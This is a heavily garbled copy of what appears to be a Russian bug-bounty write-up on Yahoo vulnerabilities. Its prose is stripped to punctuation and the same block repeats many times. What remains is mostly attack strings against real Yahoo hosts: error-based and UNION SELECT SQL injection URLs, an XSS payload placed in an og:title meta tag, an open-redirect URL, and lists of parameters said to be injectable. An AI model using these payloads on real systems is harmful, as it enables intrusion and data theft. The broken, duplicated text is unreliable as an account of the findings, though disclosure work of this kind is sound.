m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 ..
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1
.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>
XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.
. SQLi *.sports.yahoo.com.
.
http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711
. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :
sports.yahoo.com/golf/pga/schedule?season=2013
sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013
sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012
sports.yahoo.com/golf/lpga/schedule?season=2012
sports.yahoo.com/golf/champions/schedule?season=2012
sports.yahoo.com/golf/web.com/schedule?season=2013
sports.yahoo.com/golf/european/schedule?season=2013
sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012
:
sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23
sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting
ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting
ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting
ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0
ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013
ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013
sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29
:
sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013
:
racing.fantasysports.yahoo.com/auto/expertpicks?week=35
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
(stat1/2):
baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013
football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013
baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1
basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012
basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1
:
- Union select - - , - .
- , USERNAME@%
- @@hostname , 40+ . MySQL. . , . . .
- , year=postseason_2013 information_schema, . , hex, - .
:
racing.fantasysports.yahoo.com/auto/playerdistribution?week=35
UNION SELECT:
http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2
. - , , . , , UNION " - ". :
union select 1, ord(substr(user(),1,1))/100,1.
:
SQL . .
. Open redirect m.yahoo.com.
m.yahoo.com, ( : dark side of reproduce this bug ), :
Welcome to Yahoo
Thanks for signing in!
It looks like you customized your Home Page before you signed in. What would you like to do?
[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview
"Not sure". POST- :
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en
Firebug' GET:
m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS
- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :
http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED
, , : " ?!". Yahoo 394 .
. SQLi hk.promotion.yahoo.net.
. , , yahoo.net . , . - . .
, error-based SQLi:
http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928
, . XSS info.yahoo.com.
( ).
http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390
- , . - .
. http https. , , , , meta- og:title og:description . meta- :
<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>XSS. . XSS, Chrome, .
.
, Yahoo. . . , .
.
finance.yahoo.com. , UNION SELECT SQLi c . :
21.11 -
25.11 -
27.11 - : " , "
27.11 - - .
2.12 - : " , ."
"WTF?!!!" - . .
10.12 - . , , , : ", . ."
, Yahoo XSS SQLi " ":
, , . , , .
, , , , , -10 Yahoo - Wall of Fame .
- : hackerone.com/4lemon .
PS. . . , HackerOne , . - Yahoo 10 .
.
, XSS.
. SQLi *.sports.yahoo.com.
.
